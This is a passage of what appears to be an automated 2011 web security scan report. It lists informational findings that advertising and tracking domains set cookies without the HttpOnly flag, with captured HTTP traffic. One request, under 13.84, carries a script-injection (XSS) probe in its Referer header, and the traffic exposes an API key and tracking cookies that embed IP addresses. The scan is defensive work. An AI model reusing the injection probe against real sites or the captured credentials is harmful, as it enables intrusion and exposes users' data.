GET /v1/profile.redirect?callback_url=http%3A%2F%2Fpix04.revsci.net%2FD10889%2Fa1%2F0%2F3%2F0.gif%3FD%3DDM_LOC%3Dhttp%3A%2F%2Fbizo.com%3F&api_key=bbe168f7d7bf46369bbe29684c749a27 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe3KZNYajTv8WFExkNK7HUtFp4B4dlWpgdjompglDEY6Fz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvaVisNuwTZJ71H7ipM0dUEU19JRFsRyXovJE93rVCVYWJZWr1XIQIIGVSLisisBipGPv3ipBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

13.79. http://api.twitter.com/1/FanSided/lists//statuses.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/1/FanSided/lists//statuses.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

external_referer=Bm9gjDJKLkNUA6KUQhqcURlVnkat6%2FAa0nQJRijFpP696HbzgOR%2BrPDoOcSsLUsQqgRs7aQNlpGXT0Ue1ThS%2BnB2T6v43msK%7C0; path=/; expires=Tue, 14 Jun 2011 11:03:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.80. http://apr.lijit.com///www/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apr.lijit.com
Path:	///www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ljt_reader=hICMzwpkPEwAACnGFdIAAAAE; expires=Tue, 12-Jun-2012 11:02:03 GMT; path=/; domain=.lijit.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.81. http://ar.voicefive.com/b/recruitBeacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307964080; expires=Tue 14-Jun-2011 11:21:20 GMT; path=/; domain=.voicefive.com;
ar_p20101109=exp=3&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:21:20 2011&prad=11794&arc=15313&; expires=Sun 11-Sep-2011 11:21:20 GMT; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.82. http://ar.voicefive.com/b/recruitBeacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BMX_BR=pid=p104567837&prad=63567813&arc=42361216&exp=1307964868; expires=Tue 14-Jun-2011 11:34:28 GMT; path=/; domain=.voicefive.com;
ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Mon Jun 13 11:34:28 2011&prad=63567813&arc=42361216&; expires=Sun 11-Sep-2011 11:34:28 GMT; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.83. http://ar.voicefive.com/b/wc_beacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.84. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ar_p97464717=exp=2&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:27:38 2011&prad=1468426&arc=150255&; expires=Sun 11-Sep-2011 11:27:38 GMT; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p97464717&PRAd=1468426&AR_C=150255 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

13.85. http://at.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://at.amgdgt.com
Path:	/ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UA=AAAAAQAU0bin3BdJCKyaHKNnfZTY_uD12G4DA3gBY2BgYGZgmv6DgdVtBQOj3moGhk.fGRgYOBkYGA06dv3kZGDa7s7A6pnMwGgewsDwywwh9.wVA1PGIwaWp78YGNVWMTDcy4fJydxQXQ5kM.HUu1uLF6edu1V1gXoZfL8GMzBwMTDIVzLKMDIwsGxgFAVSDAaMDEAqfSpYUPEEIzeQt3wpWG6dB5iSWsLIDxRcdI4R6ACGZfWMgkAe0C97xNNB5jIwAADD0S85; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:21:26 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.86. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 12-Jun-2013 11:01:21 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.87. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 12-Jun-2013 11:18:24 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.88. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 12-Jun-2013 11:02:19 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.89. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=4a757a7-24.143.206.42-1305663172; expires=Wed, 12-Jun-2013 11:21:21 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.90. http://b.voicefive.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=4a757a7-24.143.206.42-1305663172; expires=Wed, 12-Jun-2013 11:21:21 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.91. http://beacon.dmsinsights.com/beacon/1103771/2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://beacon.dmsinsights.com
Path:	/beacon/1103771/2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ci_id=57e71b3e-b6cc-4b23-9e80-a16941d29546; Expires=Mon, 04-Jul-2011 11:25:28 GMT; Path=/
ci_c1103771=-2.1-_; Expires=Mon, 04-Jul-2011 11:25:28 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /beacon/1103771/2 HTTP/1.1
Host: beacon.dmsinsights.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8;sz=728x90;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU_RmJ3mqStj69rmqrG8obc1aWF.hnZW8sdXNhLHQsMTMwNzk2NDMyNDU4NixjLDM0MzMxNixwYyw3NjUxNyxhYywxNjgyNzcsbyxOMC1TMCxsLDYxNDA2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVrb1cucjRjZEVmYjJYWWpGNVpzNTN0R296UzFuWlc4c2RYTmhMSFFzTVRNd056azJORE15TXpNeU1peGpMRE0wTXpjeE1TeHdZeXc0TVRnMk1DeGhZeXd4TnprNU16TXNieXhPTUMxVE1DeHNMRFkyTVRNeUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUzNaQkxXRnVPVTVzUW5sZllYbEVSMjkyUW1SNUxXWTRYMVpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RGUldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVc5blZVSkJaMVZEUVZGUlFVRkJRVUZFYUhock9HZEJRVUZCUVM0dlkyNWtQU0UzVVZKNlMwRnBOWFZCVlZGNVMyOWlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmhWeTB0Ymw5UU1WUmFWSE5GTkcxSGJHZG1hV3hsVTNSRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZMYmt0SWVqTjBhVkEzUWtFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhoVmFHbHhaVWxpYmkwd1dYRnRPWE0wZG1SQ2NuVkRTRTVRV2xFbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=1762201346?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 13 Jun 2011 11:25:28 GMT
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Last-Modified: Mon, 13 Jun 2011 11:25:28 GMT
P3P: CP="UNI COM PSA PSD CONi OUR SAM OTR COR"
Pragma: no-cache
Server: Apache/2.2.12 (Ubuntu)
Set-Cookie: ci_id=57e71b3e-b6cc-4b23-9e80-a16941d29546; Expires=Mon, 04-Jul-2011 11:25:28 GMT; Path=/
Set-Cookie: ci_c1103771=-2.1-_; Expires=Mon, 04-Jul-2011 11:25:28 GMT; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 0

13.92. http://bh.contextweb.com/bh/rtset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Thu, 07-Jun-2012 11:02:20 GMT; Path=/
pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531399.1voofy6a0tk1w.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|531292.AG-00000001389358554.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|535461.4325897289836481830.0|536088.2814750682866683.0; Domain=.contextweb.com; Expires=Tue, 12-Jun-2012 11:02:20 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.93. http://bpx.a9.com/ads/getad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bpx.a9.com
Path:	/ads/getad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bpx_ustats="IhRhDcnYghU7pyAAbsxd5UU6Iw0AeU1O001mDUe3skr17UuADxj4342FuDA2oz4BG+TAu/Mg/IU="; Version=1; Max-Age=86400; Expires=Tue, 14-Jun-2011 11:25:36 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/getad?p=281&v=1&r=774120 HTTP/1.1
Host: bpx.a9.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Set-Cookie: bpx_ustats="IhRhDcnYghU7pyAAbsxd5UU6Iw0AeU1O001mDUe3skr17UuADxj4342FuDA2oz4BG+TAu/Mg/IU="; Version=1; Max-Age=86400; Expires=Tue, 14-Jun-2011 11:25:36 GMT; Path=/
Content-Type: text/javascript
Content-Length: 406
Date: Mon, 13 Jun 2011 11:25:36 GMT

a9_render_ad({"s":"300x250","tr":false,"nid":147,"p":281,"n":"Amazon Performance Display Ads Prod","html":"<script language='javascript'>\r\nvar slot = 'tr';\r\nvar base_url = 'http://www.imdb.com/ima
...[SNIP]...

13.94. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A3=jDClaTYi0cbS00001kkgaaRpa038X00001hITfaPj402WG00001jkozaUUI0c7w00001kfxTaPj40aLz00001iWmhaSED0cb100001jNtbaUUO09sO00000kfL6aPj30aLz00001htTqaPvL02WG00001jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001iOnPaUUK03sY00001kDFiaPj408HF00001kDBSaRp908HF00001jxYWaUMm0bn800001kMmAaPj208B400001jpQXaRwv05qO00001kHfhaPj302WG00001hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001jkncaRBL0c7w00001kSTxaRuU06yP00001jA0ZaPj206hH00001kGfMaPj208HF00002kHgWaPj002WG00002jkpdaPj30c7w00001jAsGaPj002WG00001jNtfaUUK09sO00000kCKXaXnq08HG00002kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kDAVaRp908HF00001kMqaaPj302WG00001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001kMnvaPj008B400001kcLvaUUK0dCb00001; expires=Sun, 11-Sep-2011 07:22:42 GMT; domain=.serving-sys.com; path=/
B3=8Vlw0000000001u+a9iq0000000001uQ8Whx0000000001uK9j0T0000000001u+afDX0000000002uK990p0000000002v59ZD90000000001uQ9fOC0000000002uK8nlR0000000001uK9cm20000000001uTalVe0000000001u+a0fG0000000001uZ8DfZ0000000001uKajUW0000000001u+89+70000000001uQahIj0000000001uK9XzA0000000001u+93LT0000000001uQ9i8d0000000001uKahI50000000001uK84hR0000000002uQ9xux0000000001uXa9it0000000001uQ9i8b0000000001uK9D2u0000000000u+9X5M0000000001uW8DfJ0000000001uK9iQ70000000002uQ9D2y0000000000u+9xuy0000000001uX7dOu0000000001uY9XJ40000000001uR9gvS0000000001uKa9j40000000001uK9v4a0000000001uK9gvT0000000001uK7dYp0000000001uK9qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+; expires=Sun, 11-Sep-2011 07:22:42 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.95. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u2=a63925c0-e4e4-4878-9376-941d163fe5713Iy0c0; expires=Sun, 11-Sep-2011 07:41:27 GMT; domain=.serving-sys.com; path=/
eyeblaster=FLV=10.3181&RES=128&WMPV=0; expires=Sun, 11-Sep-2011 07:41:27 GMT; domain=bs.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.96. http://btg.mtvnservices.com/aria/guid.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://btg.mtvnservices.com
Path:	/aria/guid.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

aria_guid=1307963888-186; expires=Thu, 10 Jun 2021 11:18:08 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aria/guid.html HTTP/1.1
Host: btg.mtvnservices.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 466
Content-Type: text/javascript
Set-Cookie: aria_guid=1307963888-186; expires=Thu, 10 Jun 2021 11:18:08 GMT;path=/
ETag: "6fadfe0bc7ebeb328cca25f9535bd0f5:1296687166"
P3P: CP: IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT
Vary: Accept-Encoding
Cache-Control: max-age=4208
Date: Mon, 13 Jun 2011 11:18:08 GMT
Connection: close

                                   var guid_domain = location.hostname;
   var guid_domain_parts = guid_domain.split(".");
   if(guid_domain_parts.length>2)guid_domain = guid_domain_parts[guid_domain_parts.length-2]+"."+
...[SNIP]...

13.97. http://ce.lijit.com/merge previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ce.lijit.com
Path:	/merge

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D; expires=Tue, 12-Jun-2012 11:02:21 GMT; path=/; domain=.lijit.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.98. http://cm.npc-lee.overture.com/js_1_0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.npc-lee.overture.com
Path:	/js_1_0/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UserData=02u3hs9yoaLQsFTjBpdHN1MjJzNHI0tDS0NnBUdk%2bLSi4sTU1JNbEBAGNDCwNHCydLI2cAAxJW/Qw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 10-Jun-2021 11:01:23 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.99. http://csc.beap.ad.yieldmanager.net/i previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://csc.beap.ad.yieldmanager.net
Path:	/i

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

S=s=dlgrn4h6vbrg3&t=1307962883;path=/; expires=

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i?bv=1.0.0&bs=(124jd236s(gid$71af4ade-95ac-11e0-9f5c-6be4e80a4031,st$1307962869533661,v$1.0))&t=blank&al=(as$128mabnbj,aid$ABkJOkwNjeA-,bi$795073051,ct$25,at$0) HTTP/1.1
Host: csc.beap.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=163

Response

13.100. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__adroll=d10276ea02f90b643e343970f448660f; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM?pv=4694778565.317392&cookie=&width=300&height=250&x=0&y=0&keyw=&cpm=g)))TfX9OwANT9wK5X7HoUIl-3PEgN44d0Iq9sK8DQ HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307984779&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966778417&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307966778450&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=785162123&ga_fc=1&u_tz=-300&u_his=15&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=1095&xpc=a0nyvi7KDh&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=d10276ea02f90b643e343970f448660f

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 13 Jun 2011 12:06:23 GMT
Connection: keep-alive
Set-Cookie: __adroll=d10276ea02f90b643e343970f448660f; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
